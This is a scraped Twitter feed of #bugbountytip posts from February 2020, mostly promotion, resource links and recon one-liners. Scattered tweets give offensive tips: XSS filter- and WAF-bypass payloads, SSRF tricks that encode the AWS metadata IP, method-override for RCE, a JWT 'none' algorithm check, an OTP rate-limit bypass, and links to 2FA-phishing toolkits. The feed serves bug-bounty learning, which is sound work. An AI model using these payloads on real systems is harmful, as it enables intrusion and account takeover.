โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-13 19:45:34
0 From checkra1n to Frida: iOS App Pentesting Quickstart on iOS 13 Follow #Hackdoor Facebook https://t.co/iNczOcGmCt Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training https://t.co/mHCTPO2kMP
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-13 18:06:51
0 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/Nm2ZSJHS74
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-13 18:06:16
0 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/spJfF1f6qy
Ganesh Bagaria
@Ganofins


2020-02-13 14:24:50
0 I just finished Access Control materials and labs on @WebSecAcademy Any suggestion for other labs or exercises or live sites based on access control vulnerabilities? #accesscontrol #idor #portswigger #bugbountytip
INTIGRITI
@intigriti


2020-02-13 14:05:21
18 โš ๏ธ Are you signing your JWT tokens? Good...unless hackers can change the signing algorithm to ๐˜ฏ๐˜ฐ๐˜ฏ๐˜ฆ. Make sure to check this, or @yassineaboukir will do it for you and claim yet another #BugBounty! ๐Ÿ˜‚ #BugBountyTip #HackWithIntigriti https://t.co/1sW1B766Qi
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-02-13 12:39:55
1 New write-up for beginners like me. #hackwithcommunity #bugbountytips #bugbountytip #infosec https://t.co/DaPtYGY7pB
Seasoned Cyber Security Professionals
@scspcommunity


2020-02-13 09:10:16
7 #bugbounty tips part 2 #hacking #ethicalhacking #bugbounty #bugbountytip #securitytesting #webapp #pentesting #webapptesting #webappsecurity #appsec #hackerone #bugcrowd #bounty #infosec #cybersec #cybersecurity #informationsecurity #hacker #bughunting #bugbountytips https://t.co/4pcPahsC8Z
Your Next Bug Tip
@YourNextBugTip


2020-02-13 08:38:07
1 Reflected XSS on 8x8 Found In 3 minutes by @gkhck_ Recently I have seen lots of people using ARJUN to find hidden parameters. Great Tool by @s0md3v Must Read WriteUp Here(1min read) #bugbounty #bugbountytips #bugbountytip https://t.co/Ga3x3fxeiO
HackDoor
@hackd00r


2020-02-13 04:03:45
0 Resources-for-Beginner-Bug-Bounty-Hunters https://t.co/IWvPfE8LgK Follow #Hackdoor - Facebook - https://t.co/lb0uyl3k4p LinkedIn - https://t.co/Chd0Qii4TT Instagram - https://t.co/1YqKY0ZFK1 Youtube - https://t.co/ovEGR1Is7q #BugBounty #BugBountyTip #pentesting #devsecops
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-13 04:01:14
0 Resources-for-Beginner-Bug-Bounty-Hunters Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining https://t.co/ZHnkjd1adq
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-13 00:55:20
1 Google Dorking: https://t.co/AoJ94PbopC #OSINT #bugbountytip #Hacking
jdksec
@jdksec


2020-02-13 00:30:14
2 So lost in tmux nested sessions....... ๐Ÿ˜‚ #bugbounty #bugbountytip #hackerone #bugcrowd #allthegearnoidea https://t.co/EeS49RPLEY
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-02-12 21:27:08
1 My first BB Write Up : How I paid 2$ for a +1000$ XSS https://t.co/QYXjW7O3xv #BugBounty #bugbountytips #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-12 18:00:14
3 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/3zAyRpdIfd
Evan Custodio
@defparam


2020-02-12 16:56:09
0 If y'all haven't heard about cloud-init, check it out https://t.co/y4S8Gdwqro #bugbountytips #bugbountytip https://t.co/cADixG2ti4
Cryptographer
@crypt0gr4ph3r


2020-02-12 15:51:15
0 Awarded $1,000 bounty of out of scope but very sensitive info disclose. Thanks @NahamSec for this #bugbountytip #bugbounty #hackerone https://t.co/eMGfDHxeGl
siLLyDaDDy
@sillydadddy


2020-02-12 14:02:31
0 #bugbounty #bugbountytip Just finished reading the book "web application hackers handbook ". Still very relevant .Awesome book.Highly recommended for new bug bounty hunters ... I will go back to it again later !!!! Thanks @DafyddStuttard and @MDSecLabs for your hard work !!!
o k t a v a n d i
@0ktavandi


2020-02-12 13:46:03
0 any tips to create 'null' origin? #bugbountytips #bugbountytip
Evan Custodio
@defparam


2020-02-12 13:39:42
1 I know some of you are doing this but, wanna increase your recon game? Create an automation framework on your VPS provider. I went from manual scans to 5-10 droplet workers auto scanning my targets. My recon data to analyze increased 10x. #bugbountytip (insert draw the owl meme)
Darkside
@darksh1d3


2020-02-12 12:07:24
1 Good references for bounty hunters #OffSec Advanced Web Attacks and Exploitation Resources https://t.co/blPPs3GtWSย โ€ฆ #OSWE #bugbountytips #bugbountytip https://t.co/b7dMpByfTW
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-12 07:50:06
1 you can visite this website if you want To see a list of websites that have been hacked before: https://t.co/TMHG53oRIW a very useful free service that offers various DNS,networking,and e-mail analysis tools: https://t.co/7eVKGC0pjK #bugbountytip #hacking #pentest #redteam #OSINT https://t.co/Q1lc0ECSNs
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-12 07:48:02
3 Reverse Image Search: https://t.co/v4L4gqyvJY Google custom search engine: 300+ Social Networking Sites: https://t.co/WbGXl5hOUb street webcams: https://t.co/rxcrybQxsW #bugbountytip #hacking #pentest #redteam #OSINT https://t.co/osHNr287ql
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-12 07:41:59
4 This is the world biggest directory of online surveillance security cameras: https://t.co/IubMc5i95o Simple Twitter Profile Analyzer,Tweets metadata scraper & activity analyzer: https://t.co/M6v3uQ9lll -LinkedIn Contact Extractor: https://t.co/Yh4129EoDE #bugbountytip #OSINT
HackDoor
@hackd00r


2020-02-12 06:07:19
3 AWS Solutions Architect Certification - 2020 AWS IAM Tutorial https://t.co/9GjGq8WS9o #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
GokhanGK
@gkhck_


2020-02-12 05:05:46
7 New write-up for beginners like me. #hackwithcommunity #bugbountytips #bugbountytip #infosec https://t.co/DZ9AyAymfC
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-12 01:28:20
4 I enjoyed reading these books! #bugbountytip #hacking #pentest #bash #Linux https://t.co/pfIXoXwn20
Andrew Roe
@aroe1994


2020-02-12 01:27:45
0 Stream is live with some HackTheBox! Day 1 on my quest to master bug bounties. https://t.co/a2ASaTS2z3 #CyberSec #bugbountytip
The Notorious B.E.E. ๐Ÿ
@securibee


2020-02-11 19:09:26
4 Earlier today on @NahamSec Twitch stream someone asked if bug bounty is largely luck based. I replied with the following quote "Absolute Success is Luck. Relative Success is Hard Work." You can read more about it here https://t.co/KhoKqRXqjE #bugbounty #bugbountytip
baluz๐Ÿ”ฅ
@0xbalooz


2020-02-11 18:18:25
0 @OffensiveHunter @santi_lopezz99 will this tweet will be in next @intigriti and @PentesterLand blog as a #bugbountytip
Patrik Fehrenbach๐Ÿค–๏ฃฟ
@ITSecurityguard


2020-02-11 18:03:27
34 dear Bug Bounty world: DON'T spend money on ANY paid courses/mentors you'll find online, the information shared there is already public. Learn how to use Google and most importantly learn how to apply your knowledge. THERE ARE NO SECRETS FOR SALE ๐Ÿ‘ˆ #bugbounty #bugbountytip
Beatrix_Kiddo
@ki_twyce_


2020-02-11 17:34:54
0 My homeboy @aptSemi taught me about virtual workstations with VMware. It gave me the ability to get some experience in a linux environment. He also taught me about SQL injection and a few other things, and no I haven't done it yet ๐Ÿ‘€๐Ÿ˜‚ but I'm grateful for the #bugbountytip https://t.co/B76nNVp2hf
Your Next Bug Tip
@YourNextBugTip


2020-02-11 16:24:50
0 @santi_lopezz99 So thats why instead of naming the title you just sold @OffensiveHunter's content, Great Tip #bugbountytips #bugbountytip #bugbounty
but most of all, samy is my hero
@SecGus


2020-02-11 15:24:42
1 #bugbountytip If you find an Open Redirect, check for Reflected / DOM based XSS, sometimes it is just a case of local JS updating the DOM to redirect to whatever parameter you included, and other times the parameters contents is directly inserted into window.location.href.
Arif Khan
@payloadartist


2020-02-11 14:57:00
1 Amazing handy cheatsheets for mobile #security testing! #bugbounty #bugbountytip https://t.co/va8IVbdNjC
bughuntercat
@bughuntercat


2020-02-11 14:17:42
0 #bugbountytip Don't be gossip or envious of who knows or has more than you. Better strive to learn for yourself and don't try to steal someone else's effort as if you were a vulture.
Dominik Maล‚owiecki
@5up3rD43m0n


2020-02-11 12:23:35
0 Dear hackers when testing for XSS and trying to include remote js file, please don't forget to upgrade your SSL certificate. #LoL #bugbountytip https://t.co/voWmkahw4x
HackDoor
@hackd00r


2020-02-11 11:25:43
1 Bug Bounty Tutorial - Maximise Your Bug Bounty Output With Simple Nmap Script https://t.co/tRFLvb0ep1 #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-11 11:25:23
1 Bug Bounty Tutorial - Maximise Your Bug Bounty Output With Simple Nmap Script https://t.co/0gfcgW7uTM #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
Pranav Hivarekar
@HivarekarPranav


2020-02-11 05:56:18
1 Blind XSS write ups: 1] https://t.co/eWtYmGPgaL 2] https://t.co/yNGKoJnlZY 3] https://t.co/WLZhTHgBYt #bugbounty #bugbountytip
Hussein Daher
@HusseiN98D


2020-02-10 21:39:29
1 The best #bugbountytip I can give is not to diversify much with tools that do the same work. Test all tools which are for one task and keep the best. You'll gain more in speed and less headache
healthyoutlet
@healthyoutlet


2020-02-10 20:19:38
1 want to know if a hash that was recently generated is actually a timestamp? for i in $(seq $($(echo date +%s)-1000|bc) $($(echo date +%s)+1000|bc)); do echo $i | sha256sum; done | grep YOURHASH #bugbountytip
Doug Little Jr
@douglittlejr


2020-02-10 19:36:00
0 @LindseyGrahamSC @JudgeJeanine @seanhannity @LindseyGrahamSC, been doing #Cybersecurity bout as long as you've been doing legislating. What you did to be doing what you are doing now? Younger days possessed less self control, would be deep diving every #bigdata known 2 know. Heads up, @GOP a #bugbountytip buyer & seller https://t.co/xdb5QaRPcd
Udit Bhadauria
@udit_thakkur


2020-02-10 14:41:12
0 Weird rate_limit bypass: #bugbountytip #bypass #infosec Reported rate limit on OTP sms. Company fixed the issue. To bypass: Capture the request. Remove the country code +91 to [ ] Modify the number from xxxxx-xxxxx to +91 xxxxx-xxxxx Bypass successful. ๐Ÿ˜‚๐Ÿ˜‚
siLLyDaDDy
@sillydadddy


2020-02-10 13:24:35
0 How long it did take for you to get your first triage , after you started bug bounty hunting ? .please RT. #bugbounty #bugbountytip
Your Next Bug Tip
@YourNextBugTip


2020-02-10 11:02:48
0 Is there any platform that provide CTFs for latest CVEs, so we can learn from them? Do @PentesterLab @hackthebox_eu have something like that? #bugbounty #bugbountytips #bugbountytip
แƒ’แƒแƒฉแƒ แƒแƒฅแƒ แƒแƒซแƒ” (Gocha Okradze)
@GochaOqradze


2020-02-10 09:15:01
0 #bugbountytip #nmap Extract subdomains from IP range. nmap IP_range | grep "domain" | awk '{print $5}' Exemple for bitdefender https://t.co/5IY0ieaOWZ
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-10 08:35:46
0 Cross Site Scripting Basics - OWASP Juice Shop Tutorial OWASP Top Ten https://t.co/0wdvBhdOHw #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining #devsecops #cybersecurity #training #ceh #eccouncil #certification #hackerone
HackDoor
@hackd00r


2020-02-10 08:35:08
0 Cross Site Scripting Basics - OWASP Juice Shop Tutorial OWASP Top Ten https://t.co/EBV0NpKxBQ #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining #devsecops #cybersecurity #training #ceh #eccouncil #certification #hackerone
HackDoor
@hackd00r


2020-02-10 08:33:11
0 StrandHogg Bug - Unpatched Android OS Vulnerability https://t.co/HlOcn2eebr #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining #devsecops #cybersecurity #training #ceh #eccouncil #certification #hackerone
HackDoor
@hackd00r


2020-02-10 08:31:45
13 Easy Subdomain Enumeration Using Censys For Bug Bounty https://t.co/xdWLzfLtCf #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining #devsecops #cybersecurity #training #ceh #eccouncil #certification #hackerone
HackDoor
@hackd00r


2020-02-10 08:26:56
0 #bugbountyTip : Find Hidden HTTP headers and inject them, this is a simple way to reach HIGH RISK security bugs ! Follow #Hackdoor -๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ Facebook - https://t.co/lb0uyl3k4p #BugBounty #BugBountyTip #bugbountytips #pentesting #CyberSecurityTraining #devsecops #cybersecurity
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-10 08:26:39
2 #bugbountyTip : Find Hidden HTTP headers and inject them, this is a simple way to reach HIGH RISK security bugs ! Follow #Hackdoor -๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ Facebook - https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #bugbountytips #pentesting #CyberSecurityTraining #devsecops #cybersecurity
HackDoor
@hackd00r


2020-02-10 06:03:31
0 Machine Learning With Python https://t.co/xgVzOtztBU Follow #Hackdoor - Facebook - https://t.co/lb0uyl3k4p #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
IAM Platform
@IAM__Network


2020-02-09 21:43:54
0 IAM Platform Curated Retweet: Via: https://t.co/FPuuLiaFEk #bugbountytip If the server only allows GET and POST method, then try adding X-HTTP-Method-Override: PUT to achieve RCE via PUT method Thanks to Zigoo0 #bugbounty #infosec #informations
Mohammed Israil ๐Ÿ‡ฎ๐Ÿ‡ณ
@mdisrail2468


2020-02-09 19:44:57
2 :-: If your target site having the RSS Feed turn ON, go to https://t.co/KdPwakGJNm, and search for the `generator` tag and you may find the current WordPress version being used for potentially developing the further testings steps. #bugbounty #bugbountytip
AEMSecurity
@AEMSecurity


2020-02-09 19:27:57
1 [+] #BugbountyTip: CVE-2016-0956 - Apache Sling Core Framework Information Disclosure Vulnerability <-- You can still find many vulnerable AEM Instances (free to contact me if you need help understanding this one) #Bugbounty #TogetherWeHitHarder #BugBountyTip https://t.co/xmM8vLXCDT
Bogdan Bodishtyanu
@xalerafera


2020-02-09 19:21:16
0 If the attacked application blocks (" ") characters, then try using quotes instead of them) This will help you bypass the protection. <script>alert`1`</script> #bugbounty #bugbountytips #bugbountytip #hackerone https://t.co/2sAlUOjJOl
HackIsOn ยฎ
@hackison


2020-02-09 17:14:13
4 OSINT tools usage #osint #hacking #hackison #owasp #cybersecurity #linux #bugbounty #bugbountytip #bugbountytips #pentesting #vapt #wapt #CloudComputing #dataprivacy #GDPR #databreach #hacker https://t.co/3iqmOOZe9w
Nikhil Mahajan
@mahajan344


2020-02-09 16:44:54
0 Want to do static analysis of Andriod apps not sure how to get APK file, use following mirror website to download current/historical version of the app to find API end-points, hardcoded token, keys. #AndroidHackingMonth on @Hacker0x01 #bugbountytip #AndroidSecurity https://t.co/ko9uimIktc
Nikhil Mahajan
@mahajan344


2020-02-09 15:37:25
1 Found a firebase API key in the Andriod app, not sure what to do? use Pyrebase, A simple python wrapper for the Firebase API to test Authentication, DB and storage permissions. https://t.co/02ynuPy1tO #AndroidHackingMonth on @Hacker0x01 #bugbountytip
mohsin khan
@mohsink83789226


2020-02-09 12:27:10
0 HELP ?callback=something return something({"status": "failure", "code": 1, "data": "Missing required field 'scope'", "message": "Invalid parameters."}) how to exploit. #JSONP #CSP #bugbounty #bugbountytips #bugbountytip
Your Next Bug Tip
@YourNextBug


2020-02-09 07:44:00
0 get Bounty or get Experience 10 Facts about #BugBounty @akita_zen @ArbazKiraak https://t.co/Iderxl5Iai #bugbountytips #bugbountytip
IAM Platform
@IAM__Network


2020-02-09 07:35:30
1 IAM Platform Curated Retweet: Via: https://t.co/FPuuLisgvS #bugbountytip If the server only allows GET and POST method, then try adding X-HTTP-Method-Override: PUT to achieve RCE via PUT method Thanks to Zigoo0 #bugbounty #infosec #informations
HackIsOn ยฎ
@hackison


2020-02-09 03:59:48
1 #owasp mobile top 10 where to look them #hacking #hackison #bugbountytip #bugbounty #bugbountytips #cybersecurity #vapt #wapt #mapt #pentesting #redteam https://t.co/BlhtVxHN5i
AEMSecurity
@AEMSecurity


2020-02-08 17:50:32
3 [+] #BugbountyTip: If you come accross /api.json in any AEM instance during bug hunting, try for web cache poisoning via following headers: Host: , X-Forwarded-Server , X-Forwarded-Host and or simply try https://localhost/api.json HTTP/1.1 #Bugbounty #TogetherWeHitHarder
IAM Platform
@IAM__Network


2020-02-08 16:44:29
0 IAM Platform Curated Retweet: Via: https://t.co/FPuuLiaFEk #bugbountytip If the server only allows GET and POST method, then try adding X-HTTP-Method-Override: PUT to achieve RCE via PUT method Thanks to Zigoo0 #bugbounty #infosec #informations
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-08 14:26:12
3 different 2FA bypasses: evilginx:https://t.co/9haUXdvpV1 CredSniper:https://t.co/mFTPZYg8xY ReelPhish:https://t.co/FXtzjwgCYG Modlishka:https://t.co/mHNvbvYzF7 #pentest #hacking #phishing #redteam #bugbountytip
thehackerlab.io - jdksec.com
@jdksec


2020-02-08 13:58:16
0 Love it when a good script works first time ๐Ÿ˜‚ #bugbountytip #bugbounty #hackerone #bugcrowd https://t.co/X6WRgIpWNZ
Your Next Bug Tip
@YourNextBug


2020-02-08 12:23:18
0 Read the comments for tips #bugbountytips #bugbountytip https://t.co/2ASOZQuLtA
STร–K
@stokfredrik


2020-02-08 10:04:58
5 @Zombiehelp54 wrote this great writeup on Exploiting Out Of Band XXE using internal network and php wrappers. Check it out! loved it! https://t.co/eTCHK7RvHM #bugbounty #bugbountytip #infosec #pentest #hacking
Your Next Bug Tip
@YourNextBug


2020-02-08 05:57:26
0 How many vulnerabilities you to check to find a valid one? #bugbountytips #bugbountytip #bugbounty
๐š› ๐šŽ ๐šฃ ๐Ÿถ
@rez0__


2020-02-08 04:43:49
0 Since I'm nearing 1k followers... [Easily automate bug bounty alerting] I just posted a blog post all about it. Shout outs to @TomNomNom and findomain in it! https://t.co/wgmOENFxm1 #bugbountytips #bugbountytip ;) #rootgoat2020 @InsiderPhD @Edu4rdSHL #bugbounty https://t.co/zwSyop4naW
IAM Platform
@IAM__Network


2020-02-08 02:18:04
0 IAM Platform Curated Retweet: Via: https://t.co/FPuuLiaFEk #bugbountytip If the server only allows GET and POST method, then try adding X-HTTP-Method-Override: PUT to achieve RCE via PUT method Thanks to Zigoo0 #bugbounty #infosec #informations
ghostlulz
@ghostlulz1337


2020-02-07 22:02:20
5 XSS payload blocked by your targets content security policy (CSP)? You know you can bypass the CSP with some simple techniques? Easy wins! More info on my blog: https://t.co/LqWudgPJ50 #BugBounty #bugbountytips #bugbountytip #infosec #csp #dfir #redteam #pentest #xss #appsec https://t.co/sG0TzZMhmB
offensive
@offensi74555475


2020-02-07 03:01:51
0 If you have checklist you improve what? You have back up so you can pick it easily Save your time of recalling your engagment,it's impossible if you relied on recalling info from your memory. tell me about your checklist let's share the knowledge!! #bugbountytip #infosec
offensive
@offensi74555475


2020-02-07 02:48:34
0 Having a checklist is a great way to provide some consistency to your testing.. do you have checklist? #bugbountytip #infosec #bughunt
thehackerlab.io - jdk
@the_hacker_lab


2020-02-06 22:29:45
2 Oneliner to get all status codes, size,url and redirect url with a ',' as a delimiter: cat webservers.txt | parallel -j50 -q curl -w 'Status:%{http_code},Size:%{size_download},%{url_effective},%{redirect_url}\n' -o /dev/null -sk #bugbountytip #bugbounty #hackerone #bugcrowd https://t.co/FQYcm6U9Is
thehackerlab.io - jdk
@the_hacker_lab


2020-02-06 22:24:18
0 Oneliner to get all Http Titles (if they exist) for i in $(cat Webservers.txt ); do echo "$i | $(curl --connect-timeout 0.5 $i -so - | grep -iPo '(?<=<title>)(.*)(?=</title>)')"; done | tee -a titles.txt #bugbountytip #bugbounty #hackerone #bugcrowd https://t.co/X4O63pHYhz
Nick || hunt4p1zza
@ngkogkos


2020-02-06 19:45:59
3 When an org is heavily using SSO: 1. Create a browser instance and login w/ all self-registered accounts. 2. Browse to all assets you are aware of ("Open Multiple URLs" plugin). You never know where you may end up logged in due to SSO misconfiguration. #bugbounty #bugbountytip
Bug Bounty Village
@bugbountyvillag


2020-02-06 18:59:24
0 #bugbountytip If the server only allows GET and POST method, then try adding X-HTTP-Method-Override: PUT to achieve RCE via PUT method Thanks to @Zigoo0 #bugbounty #infosec #informationsecurity https://t.co/h1spj3muxs
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-06 16:41:13
0 Hackdoor Corporate Training #GetCertifiedWithHackdoor Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/OOUY72a4aE
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-06 14:56:00
2 Find web directories without bruteforce: https://t.co/YaIRwKnrau Abusing Certificate Transparency logs for getting HTTPS websites subdomains.: https://t.co/7mq5XiIeuv the most complete OSINT collection and reconnaissance tool: https://t.co/0uNdRKFInX #bugbountytip #Hacking
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-06 12:33:43
0 When Hackdoor Does #CoporateTrainings in Style ๐Ÿค–๐Ÿค– #Swag and #Sticker Distribution Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #devsecops #cybersecurity https://t.co/k1CDcrafMP
Keshav Malik
@g0t_rOoT_


2020-02-06 10:43:15
3 Hey Hunters ๐Ÿ˜„ Here's my First Write-up on Medium regarding an Unexpected Bounty . Do give it a read. Suggestions are welcomed ! ๐Ÿ’ฏ #bugbounty #bugbountytip #bugcrowd #hackerone #responsibledisclosure https://t.co/ZF0IXHsDL6
Grzegorz Niedziela
@gregxsunday


2020-02-06 06:39:45
0 @PaulosYibelo @Random_Robbie @MrTuxracer shodan download --limit=100000 outfile query shodan parse --fields=ip_str,port,https://t.co/qnzC7dYu8m,org,domains,hostnames --separator=";" outfile.json.gz > outfile.json 2/2 #bugbountytip
Grzegorz Niedziela
@gregxsunday


2020-02-06 06:38:48
0 @PaulosYibelo @Random_Robbie @MrTuxracer On https, use ssl certificate information. It will show you the organization the cert was issued to. From my experience, this is the most reliable way of identifying IP. Moreover, use shodan fields like org, domains, hostnames. 1/2 #bugbountytip
Sunil Kumar Singh
@0xsunil


2020-02-06 06:18:48
0 @sshell_ Please use hashtags like #bugbounty #bugbountytip #bugbountytips to reach out more people. It becomes easier for people to know. Thanks for the tip anyway.
INTIGRITI
@intigriti


2020-02-05 19:53:52
1 How to Pwn A Pwned Citrix? Is it possible to upgrade your recon with the @discordapp and tweeted @jobertabma the best #bugbountytip of the week? All of these answers are available in the latest edition of our #BugBytes! #bugbounty ๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡ https://t.co/0Qcq2tBBQo
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-05 18:53:20
0 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/Jd9xcmmcvp
/๐’…๐’†๐’—/๐’๐’–๐’๐’ ๅฐ้ขจ
@spyerror


2020-02-05 17:43:11
1 โžบ Load trial continues, a marvelous load everything is forgotten. Stay with me, checkmate.. โœฎ #BugBounty #BugBountyTip #WAF #infosec https://t.co/nsPRzexTE3
โ—พ
@saurinn_


2020-02-05 13:12:21
0 Excelent methodology and so well explain #bugbountytip #fuzzing https://t.co/Jt66YL8HQV
Yadhavi
@PrincessYadhavi


2020-02-04 21:16:50
0 I have put ssh key in settings. but when SSHed to gitlab after login welcome message, session closed immediately. Why happening this? How to solve this? #bugbountytips #bugbounty #bugbountytip
Yadhavi
@PrincessYadhavi


2020-02-04 20:40:50
2 Found a gitlab instance with register enabled. after logged in it looks really empty. how to escalate the severity? How to get code execution? And how to find gitlab version? #bugbountytips #bugbounty #bugbountytip
BlackClover
@Bc10ver


2020-02-04 12:10:55
0 Top story: @TakSec: 'XSS filter bypass using stripped </p> tag to obfuscate. P2 Stored XSS $1500 on a private bug bounty program. XSS Payload: <</p>iframe src=javascript:alert()// #xss #bugbountytip #bugbountytips #bโ€ฆ https://t.co/08qZGtvhUZ, see more https://t.co/fVnXn9Z0FJ
dawgyg
@thedawgyg


2020-02-04 04:18:15
33 When testing for SSRF using a black list, take internal IP addresses and when encoding them, dont encode entire IP. Encode 1 octet of the IP address, or 2 or 3. For Instance: AWS Metadata - 0251.254.169.254 (this got the $160,000 payout in Oct 2018) #bugbountytip #bugbounty
m0z
@LooseSecurity


2020-02-03 22:42:37
1 Repost of a #XSS payload I posted before without any parenthesis after "prompt"! Object.defineProperty(window, 'p', { get: prompt });p; By using a Getter, we invoke the prompt without any input! Ideal for bypassing WAF! #BugBounty #bugbountytips #bugbountytip #bugbounties
dawgyg
@thedawgyg


2020-02-03 21:51:04
13 When testing for SSRF, change the HTTP version from 1.1 to HTTP/0.9 and remove the host header completely. This has worked to bypass several SSRF fixes in the past. #bugbountytip #bugbountytip #bugbounty
Mike Takahashi
@TakSec


2020-02-03 20:01:52
10 XSS filter bypass using stripped </p> tag to obfuscate. P2 Stored XSS $1500 on a private bug bounty program. XSS Payload: <</p>iframe src=javascript:alert()// #xss #bugbountytip #bugbountytips #bugbounty #hacking @brutelogic https://t.co/ltjUpiL4Cu
Nick || hunt4p1zza
@ngkogkos


2020-02-03 18:22:10
0 Do you have a big file w/ URLs w/ many of them being default pages, wildcards etc? Use @TomNomNom's get-title hack to grep out common titles: cat urls.txt | get-title -c 300 > titles.txt cat titles.txt | grep -v "PATTERN" | awk -F '[()]' '{print $2}' #bugbountytip #bugbounty
kassih mouhssine
@KassihMouhssine


2020-02-03 17:18:36
0 hey anyone here targeted AT&T, if AT&T make my report triaged that's mean my report accepted 100% or not ? #BugBounty #bugbountytips #bugbountytip
Inti De Ceukelaire
@securinti


2020-02-03 16:45:39
0 @seanmeals Next time add #BugBountyTip to your post to get maximum profit
dark_warlord14
@dark_warlord14


2020-02-03 13:01:41
2 #bugbountytip #bugbountytips Never underestimate the power of Google Dorking. Just found a defaced website for bugbounty program. https://t.co/M3kEwoNDtI
Rafin Rahman Chy
@rafinrahmanchy


2020-02-03 11:20:45
3 Bug Bounty Hunting Methodology(Personal Made) #BugBounty #bugbountytip #bugbountytips #websecurity #webhacking #netsec #appsec #Recon #pentest #pentester #Pentesting #Hacking #Hacker #EthicalHacking #EthicalHacker #whitehathacker #InfoSec #InfoSecurity #ITSecurity #CyberSecurity https://t.co/yNmFJJeivP
Hyker Security
@hykersecurity


2020-02-02 20:00:41
